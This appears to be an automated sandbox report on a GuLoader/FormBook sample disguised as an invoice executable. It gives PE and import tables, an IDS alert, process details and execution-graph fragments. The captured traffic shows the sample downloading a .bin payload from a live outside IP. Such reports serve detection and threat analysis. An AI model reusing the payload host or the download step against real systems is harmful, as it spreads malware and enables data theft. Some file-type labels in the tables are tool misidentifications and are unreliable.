                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                              Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                              .text | 0x1000 | 0x6c77 | 0x6e00 | 36012ab9d2e677680493425a566cfdc6 | False | 0.6476207386363636 | data | 6.367752971155868 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata | 0x8000 | 0x1896 | 0x1a00 | 2681c11e044872fcca465fa15baf2f57 | False | 0.43028846153846156 | data | 4.8666844580675965 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data | 0xa000 | 0x1fe00 | 0x200 | 3df8362a2e9a26c792a729d2c3b1d553 | False | 0.22265625 | data | 1.680046922364517 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .ndata | 0x2a000 | 0x27000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc | 0x51000 | 0x1b7f0 | 0x1b800 | a8ef53bebf1cdcba6c23232fbc48ab1b | False | 0.38159623579545454 | DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 32.000000, slope 32.314705 | 5.430171507259301 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                              RT_ICON | 0x51328 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.16316692298592217
                              RT_ICON | 0x61b50 | 0x5f42 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9831050602804888
                              RT_ICON | 0x67a98 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.29906639004149377
                              RT_ICON | 0x6a040 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.35389305816135086
                              RT_ICON | 0x6b0e8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.4360655737704918
                              RT_ICON | 0x6ba70 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.5097517730496454
                              RT_DIALOG | 0x6bed8 | 0xb8 | data | English | United States | 0.6467391304347826
                              RT_DIALOG | 0x6bf90 | 0x144 | data | English | United States | 0.5216049382716049
                              RT_DIALOG | 0x6c0d8 | 0x100 | data | English | United States | 0.5234375
                              RT_DIALOG | 0x6c1d8 | 0x11c | data | English | United States | 0.6056338028169014
                              RT_DIALOG | 0x6c2f8 | 0x60 | data | English | United States | 0.7291666666666666
                              RT_GROUP_ICON | 0x6c358 | 0x5a | data | English | United States | 0.7888888888888889
                              RT_VERSION | 0x6c3b8 | 0x194 | OpenPGP Secret Key | English | United States | 0.5668316831683168
                              RT_MANIFEST | 0x6c550 | 0x29b | XML 1.0 document, ASCII text, with very long lines (667), with no line terminators | English | United States | 0.5667166416791605
DLL | Import
ADVAPI32.dll | RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyW, RegEnumValueW, RegQueryValueExW, RegSetValueExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, SetFileSecurityW, RegCreateKeyExW, RegOpenKeyExW
SHELL32.dll | ShellExecuteExW, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, SHGetSpecialFolderLocation
ole32.dll | OleInitialize, OleUninitialize, CoTaskMemFree, IIDFromString, CoCreateInstance
COMCTL32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll | DispatchMessageW, wsprintfA, SystemParametersInfoW, SetClassLongW, GetWindowLongW, GetSysColor, ScreenToClient, SetCursor, GetWindowRect, TrackPopupMenu, AppendMenuW, EnableMenuItem, CreatePopupMenu, GetSystemMenu, GetSystemMetrics, IsWindowEnabled, EmptyClipboard, SetClipboardData, CloseClipboard, OpenClipboard, CheckDlgButton, EndDialog, DialogBoxParamW, IsWindowVisible, SetWindowPos, CreateWindowExW, GetClassInfoW, PeekMessageW, CallWindowProcW, GetMessagePos, CharNextW, ExitWindowsEx, SetWindowTextW, SetTimer, CreateDialogParamW, DestroyWindow, LoadImageW, FindWindowExW, SetWindowLongW, InvalidateRect, ReleaseDC, GetDC, SetForegroundWindow, EnableWindow, GetDlgItem, ShowWindow, IsWindow, PostQuitMessage, SendMessageTimeoutW, SendMessageW, wsprintfW, FillRect, GetClientRect, EndPaint, BeginPaint, DrawTextW, DefWindowProcW, SetDlgItemTextW, GetDlgItemTextW, CharNextA, MessageBoxIndirectW, RegisterClassW, CharPrevW, LoadCursorW
GDI32.dll | SetBkMode, CreateBrushIndirect, GetDeviceCaps, SelectObject, DeleteObject, SetBkColor, SetTextColor, CreateFontIndirectW
KERNEL32.dll | WriteFile, GetLastError, WaitForSingleObject, GetExitCodeProcess, GetTempFileNameW, CreateFileW, CreateDirectoryW, WideCharToMultiByte, lstrlenW, lstrcpynW, GlobalLock, GlobalUnlock, CreateThread, GetDiskFreeSpaceW, CopyFileW, GetVersionExW, GetWindowsDirectoryW, ExitProcess, GetCurrentProcess, CreateProcessW, GetTempPathW, SetEnvironmentVariableW, GetCommandLineW, GetModuleFileNameW, GetTickCount, GetFileSize, MultiByteToWideChar, MoveFileW, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, lstrcmpiW, lstrcmpW, MulDiv, GlobalFree, GlobalAlloc, LoadLibraryExW, GetModuleHandleW, FreeLibrary, Sleep, CloseHandle, SetFileTime, SetFilePointer, SetFileAttributesW, ReadFile, GetShortPathNameW, GetFullPathNameW, GetFileAttributesW, FindNextFileW, FindFirstFileW, FindClose, DeleteFileW, CompareFileTime, SearchPathW, SetCurrentDirectoryW, ExpandEnvironmentStringsW, RemoveDirectoryW, GetSystemDirectoryW, MoveFileExW, GetModuleHandleA, GetProcAddress, lstrcmpiA, lstrcpyA, lstrcatW, SetErrorMode
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-10T07:13:13.846740+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49796 | 212.162.149.153 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                              Jan 10, 2025 07:13:14.209975004 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.209976912 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.209988117 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.209994078 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.210000992 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.210020065 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.210040092 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.210068941 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.210589886 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.210601091 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.210612059 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.210621119 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.210633993 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.210644960 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.210653067 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.210655928 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.210665941 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.210675955 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.210680962 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.210686922 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.210699081 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.210706949 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.210707903 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.210711002 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.210722923 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.210726976 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.210733891 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.210746050 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.210750103 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.210757017 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.210771084 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.210788965 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.210805893 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.211364031 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.211442947 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.211453915 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.211464882 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.211476088 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.211486101 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.211492062 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.211497068 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.211509943 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.211512089 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.211523056 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.211530924 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.211546898 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.211594105 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.233889103 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.233897924 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.233962059 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.246504068 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.246515036 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.246522903 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.246573925 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.246577978 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.246584892 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.246596098 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.246609926 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.246620893 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.246629953 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.246632099 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.246651888 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.246686935 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.246687889 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.246799946 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.246809006 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.246819973 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.246835947 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.246846914 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.246856928 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.246856928 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.246885061 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.246912003 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.247138977 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247148991 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247159004 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247172117 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247193098 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247200012 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.247203112 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247215033 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247222900 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.247240067 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.247267962 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.247476101 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247486115 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247494936 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247504950 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247517109 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247528076 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247528076 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.247538090 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247548103 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.247549057 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247561932 CET8049796212.162.149.153192.168.2.5
                              Jan 10, 2025 07:13:14.247564077 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.247584105 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:14.247611046 CET4979680192.168.2.5212.162.149.153
                              Jan 10, 2025 07:13:54.555022955 CET4979680192.168.2.5212.162.149.153
                              • 212.162.149.153
                              Session ID:0
                              Source IP:192.168.2.5
                              Source Port:49796
                              Destination IP:212.162.149.153
                              Destination Port:80
                              PID:4984
                              Process:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                              Timestamp:Jan 10, 2025 07:13:13.303292990 CET
                              Bytes transferred:184
                              Direction:OUT
                              Data:
                              GET /iXjlIFhRzlkjbZPQm185.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                              Host: 212.162.149.153
                              Cache-Control: no-cache

                              Timestamp:Jan 10, 2025 07:13:13.846641064 CET
                              Bytes transferred:1236
                              Direction:IN
                              Data:
                              HTTP/1.1 200 OK
                              Content-Type: application/octet-stream
                              Last-Modified: Wed, 08 Jan 2025 10:34:20 GMT
                              Accept-Ranges: bytes
                              ETag: "baf81e0b861db1:0"
                              Server: Microsoft-IIS/8.5
                              Date: Fri, 10 Jan 2025 06:13:15 GMT
                              Content-Length: 287808



                              Target ID:0
                              Start time:01:12:38
                              Start date:10/01/2025
                              Path:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe"
                              Imagebase:0x400000
                              File size:533'960 bytes
                              MD5 hash:4F2C796AEBD02A54CA9BEBB0C5BC5EF0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2338207417.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Target ID:3
                              Start time:01:13:09
                              Start date:10/01/2025
                              Path:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe"
                              Imagebase:0x400000
                              File size:533'960 bytes
                              MD5 hash:4F2C796AEBD02A54CA9BEBB0C5BC5EF0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2776555713.0000000032150000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true


                                Execution Graph

                                Execution Coverage:23.6%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:19.6%
                                Total number of Nodes:1565
                                Total number of Limit Nodes:40
6fa4109e GlobalAlloc 5015->5018 5016->5013 5016->5015 5020 6fa410b8 GlobalFree 5017->5020 5019 6fa415c5 3 API calls 5018->5019 5019->5017 5020->5007 5021 40285f 5022 402883 5021->5022 5023 402899 5021->5023 5024 403002 17 API calls 5022->5024 5025 4028c3 5023->5025 5026 40289e 5023->5026 5035 402889 5024->5035 5028 40303e 17 API calls 5025->5028 5027 40303e 17 API calls 5026->5027 5029 4028a5 5027->5029 5030 4028ca lstrlenW 5028->5030 5038 406444 WideCharToMultiByte 5029->5038 5030->5035 5031 402910 5033 4028b5 lstrlenA 5033->5035 5034 4028fc 5034->5031 5036 4069e6 WriteFile 5034->5036 5035->5031 5035->5034 5037 40645f 5 API calls 5035->5037 5036->5031 5037->5034 5038->5033 5039 404060 5040 404087 5039->5040 5041 40409d 5039->5041 5100 406a15 GetDlgItemTextW 5040->5100 5042 4040a7 GetDlgItem 5041->5042 5051 40411a 5041->5051 5045 4040bf 5042->5045 5044 404092 5047 406d18 5 API calls 5044->5047 5049 4040d3 SetWindowTextW 5045->5049 5052 406ba0 4 API calls 5045->5052 5046 404139 5048 404098 5046->5048 5102 406a15 GetDlgItemTextW 5046->5102 5047->5048 5056 405736 8 API calls 5048->5056 5053 4054f5 18 API calls 5049->5053 5051->5046 5055 405e95 17 API calls 5051->5055 5057 4040c9 5052->5057 5058 4040f0 5053->5058 5054 404230 5059 406613 18 API calls 5054->5059 5060 404195 SHBrowseForFolderW 5055->5060 5062 4043f1 5056->5062 5057->5049 5068 406531 3 API calls 5057->5068 5063 4054f5 18 API calls 5058->5063 5064 404236 5059->5064 5060->5046 5061 4041b0 CoTaskMemFree 5060->5061 5067 406531 3 API calls 5061->5067 5065 4040fb 5063->5065 5103 406af5 lstrcpynW 5064->5103 5101 4054de SendMessageW 5065->5101 5071 4041bd 5067->5071 5068->5049 5070 404250 5073 4068c1 5 API calls 5070->5073 5074 4041fa SetDlgItemTextW 5071->5074 5077 405e95 17 API calls 5071->5077 5072 404101 5075 4068c1 5 API calls 5072->5075 5076 404256 5073->5076 5074->5046 5075->5048 5086 406ceb 2 API calls 5076->5086 5087 4042ab 5076->5087 5088 404305 5076->5088 5078 4041db lstrcmpiW 5077->5078 5078->5074 5081 
4041ef lstrcatW 5078->5081 5080 4042b7 5082 406ba0 4 API calls 5080->5082 5081->5074 5083 4042bd GetDiskFreeSpaceW 5082->5083 5085 4042e5 MulDiv 5083->5085 5083->5088 5085->5088 5086->5076 5104 406af5 lstrcpynW 5087->5104 5089 40437c 5088->5089 5105 40553b 5088->5105 5091 4043a4 EnableWindow 5089->5091 5093 401533 94 API calls 5089->5093 5091->5048 5094 4043cd 5091->5094 5092 404364 5095 404368 5092->5095 5096 40437e SetDlgItemTextW 5092->5096 5097 4043a2 5093->5097 5094->5048 5113 405517 SendMessageW 5094->5113 5099 40553b 20 API calls 5095->5099 5096->5089 5097->5091 5099->5089 5100->5044 5101->5072 5102->5054 5103->5070 5104->5080 5106 405550 5105->5106 5107 405e95 17 API calls 5106->5107 5108 4055d9 5107->5108 5109 405e95 17 API calls 5108->5109 5110 4055e5 5109->5110 5111 405e95 17 API calls 5110->5111 5112 4055f1 lstrlenW wsprintfW SetDlgItemTextW 5111->5112 5112->5092 5113->5048 5114 401ce0 5115 40303e 17 API calls 5114->5115 5116 401ce7 5115->5116 5117 403002 17 API calls 5116->5117 5118 401cf0 wsprintfW 5117->5118 5119 402ea1 5118->5119 5120 6fa41000 5123 6fa4101b 5120->5123 5124 6fa4156c GlobalFree 5123->5124 5125 6fa41020 5124->5125 5126 6fa41024 GlobalAlloc 5125->5126 5127 6fa41032 5125->5127 5126->5127 5128 6fa415c5 3 API calls 5127->5128 5129 6fa41019 5128->5129 5130 403d65 5131 403d7a 5130->5131 5132 403e9f 5130->5132 5136 4054f5 18 API calls 5131->5136 5133 403f20 5132->5133 5134 403ead 5132->5134 5135 403f2b GetDlgItem 5133->5135 5149 403f1b 5133->5149 5141 403eda GetDlgItem SendMessageW EnableWindow 5134->5141 5134->5149 5138 403f4d 5135->5138 5139 403fee 5135->5139 5140 403de9 5136->5140 5137 405736 8 API calls 5152 404033 5137->5152 5145 403f7d SendMessageW LoadCursorW SetCursor 5138->5145 5138->5149 5143 403fff 5139->5143 5139->5149 5142 4054f5 18 API calls 5140->5142 5159 405517 SendMessageW 5141->5159 5146 403df8 CheckDlgButton EnableWindow GetDlgItem 5142->5146 5147 404007 SendMessageW 5143->5147 5148 40401e 5143->5148 5160 4069ce 
ShellExecuteExW 5145->5160 5158 4054de SendMessageW 5146->5158 5147->5148 5148->5152 5153 404023 SendMessageW 5148->5153 5149->5137 5153->5152 5154 403fe0 LoadCursorW SetCursor 5154->5139 5155 403e2b SendMessageW 5156 403e50 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5155->5156 5157 403e47 GetSysColor 5155->5157 5156->5152 5157->5156 5158->5155 5159->5149 5160->5154 5161 402566 5162 40256e 5161->5162 5167 402574 5161->5167 5163 40303e 17 API calls 5162->5163 5163->5167 5164 40303e 17 API calls 5166 402585 5164->5166 5165 402594 5169 40303e 17 API calls 5165->5169 5166->5165 5168 40303e 17 API calls 5166->5168 5167->5164 5167->5166 5168->5165 5170 40259d WritePrivateProfileStringW 5169->5170 5171 405667 lstrlenW WideCharToMultiByte 5172 402d69 5173 403002 17 API calls 5172->5173 5174 402d6f 5173->5174 5175 405e95 17 API calls 5174->5175 5176 401709 5174->5176 5175->5176 5177 401eea 5178 401ef4 5177->5178 5179 401efe GetDlgItem 5177->5179 5180 403002 17 API calls 5178->5180 5181 401efb 5179->5181 5180->5181 5182 401f3c GetClientRect LoadImageW SendMessageW 5181->5182 5183 40303e 17 API calls 5181->5183 5185 401fa7 5182->5185 5186 401f9c 5182->5186 5183->5182 5186->5185 5187 401fa0 DeleteObject 5186->5187 5187->5185 5188 401aec 5189 401aa2 5188->5189 5192 401ab1 5188->5192 5190 40303e 17 API calls 5189->5190 5191 401aa7 5190->5191 5193 4066f4 66 API calls 5191->5193 5193->5192 5194 40216c 5195 40303e 17 API calls 5194->5195 5196 402173 5195->5196 5197 4065aa 2 API calls 5196->5197 5198 402179 5197->5198 5199 402188 5198->5199 5201 4065fa wsprintfW 5198->5201 5201->5199 4238 404f6d 4239 404f8c 4238->4239 4240 40510e 4238->4240 4239->4240 4243 404f98 4239->4243 4241 405122 GetDlgItem GetDlgItem 4240->4241 4242 40515b 4240->4242 4244 4054f5 18 API calls 4241->4244 4245 4051b2 4242->4245 4256 401399 94 API calls 4242->4256 4246 404fb7 4243->4246 4247 404f9d SetWindowPos 4243->4247 4248 405145 SetClassLongW 4244->4248 4250 4054c3 SendMessageW 4245->4250 
4257 405109 4245->4257 4251 40500a 4246->4251 4252 404fbc ShowWindow 4246->4252 4249 4050fa 4247->4249 4255 401533 94 API calls 4248->4255 4262 405736 8 API calls 4249->4262 4279 4051c4 4250->4279 4253 405012 DestroyWindow 4251->4253 4254 40502c 4251->4254 4252->4249 4258 404fe1 GetWindowLongW 4252->4258 4265 405443 4253->4265 4259 405031 SetWindowLongW 4254->4259 4260 405044 4254->4260 4255->4242 4261 40518b 4256->4261 4258->4249 4263 404ffd ShowWindow 4258->4263 4259->4257 4260->4249 4267 405050 GetDlgItem 4260->4267 4261->4245 4268 40518f SendMessageW 4261->4268 4262->4257 4263->4249 4264 401533 94 API calls 4264->4279 4265->4257 4269 405476 ShowWindow 4265->4269 4266 405445 DestroyWindow EndDialog 4266->4265 4270 40506c SendMessageW IsWindowEnabled 4267->4270 4271 40508f 4267->4271 4268->4257 4269->4257 4270->4257 4273 40508b 4270->4273 4274 40509e 4271->4274 4277 4050e1 SendMessageW 4271->4277 4278 4050b0 4271->4278 4285 405096 4271->4285 4272 405e95 17 API calls 4272->4279 4273->4271 4274->4277 4274->4285 4275 4054f5 18 API calls 4275->4279 4276 405933 SendMessageW 4280 4050df 4276->4280 4277->4249 4281 4050c7 4278->4281 4282 4050b9 4278->4282 4279->4257 4279->4264 4279->4266 4279->4272 4279->4275 4287 4054f5 18 API calls 4279->4287 4300 405385 DestroyWindow 4279->4300 4280->4249 4284 401533 94 API calls 4281->4284 4314 401533 4282->4314 4286 4050ce 4284->4286 4285->4276 4286->4249 4286->4285 4288 405248 GetDlgItem 4287->4288 4289 40526f ShowWindow KiUserCallbackDispatcher KiUserCallbackDispatcher EnableWindow 4288->4289 4293 405263 4288->4293 4289->4293 4290 4052c4 GetSystemMenu EnableMenuItem SendMessageW 4291 4052f1 SendMessageW 4290->4291 4290->4293 4291->4293 4293->4289 4293->4290 4309 4054de SendMessageW 4293->4309 4310 405cf6 4293->4310 4313 406af5 lstrcpynW 4293->4313 4296 405323 lstrlenW 4297 405e95 17 API calls 4296->4297 4298 40533d SetWindowTextW 4297->4298 4299 401399 94 API calls 4298->4299 4299->4279 4300->4265 4301 40539f CreateDialogParamW 
4300->4301 4301->4265 4302 4053d2 4301->4302 4303 4054f5 18 API calls 4302->4303 4304 4053dd GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4303->4304 4305 401399 94 API calls 4304->4305 4306 405423 4305->4306 4306->4257 4307 40542b ShowWindow 4306->4307 4308 4054c3 SendMessageW 4307->4308 4308->4265 4309->4293 4311 405e95 17 API calls 4310->4311 4312 405d04 SetWindowTextW 4311->4312 4312->4293 4313->4296 4315 401399 94 API calls 4314->4315 4316 401547 4315->4316 4316->4285 5202 6fa41b0a 5203 6fa41b38 5202->5203 5204 6fa42351 21 API calls 5203->5204 5205 6fa41b3f 5204->5205 5206 6fa41b46 5205->5206 5207 6fa41b52 5205->5207 5208 6fa415eb 2 API calls 5206->5208 5209 6fa41b73 5207->5209 5210 6fa41b5c 5207->5210 5213 6fa41b50 5208->5213 5211 6fa41b9f 5209->5211 5212 6fa41b79 5209->5212 5214 6fa415c5 3 API calls 5210->5214 5216 6fa415c5 3 API calls 5211->5216 5215 6fa41668 3 API calls 5212->5215 5217 6fa41b61 5214->5217 5219 6fa41b7e 5215->5219 5216->5213 5218 6fa41668 3 API calls 5217->5218 5220 6fa41b67 5218->5220 5221 6fa415eb 2 API calls 5219->5221 5222 6fa415eb 2 API calls 5220->5222 5223 6fa41b84 GlobalFree 5221->5223 5224 6fa41b6d GlobalFree 5222->5224 5223->5213 5223->5224 5226 401af0 5227 40303e 17 API calls 5226->5227 5228 401af7 lstrlenW 5227->5228 5229 401afd 5228->5229 5230 40303e 17 API calls 5229->5230 5232 402855 5229->5232 5233 4068f6 GetFileAttributesW CreateFileW 5229->5233 5230->5229 5233->5229 4346 402af5 4347 402afc 4346->4347 4348 401709 4346->4348 4349 403002 17 API calls 4347->4349 4350 402b03 4349->4350 4351 402b10 SetFilePointer 4350->4351 4351->4348 4353 402b21 4351->4353 4352 403002 17 API calls 4352->4353 4353->4348 4353->4352 4354 402d10 4353->4354 4355 402d35 4354->4355 4356 402d25 4354->4356 4358 405e95 17 API calls 4355->4358 4357 403002 17 API calls 4356->4357 4357->4348 4358->4348 5234 402b75 5235 40303e 17 API calls 5234->5235 5236 402b7c FindFirstFileW 5235->5236 5237 402b90 5236->5237 5240 4065fa wsprintfW 5237->5240 5239 
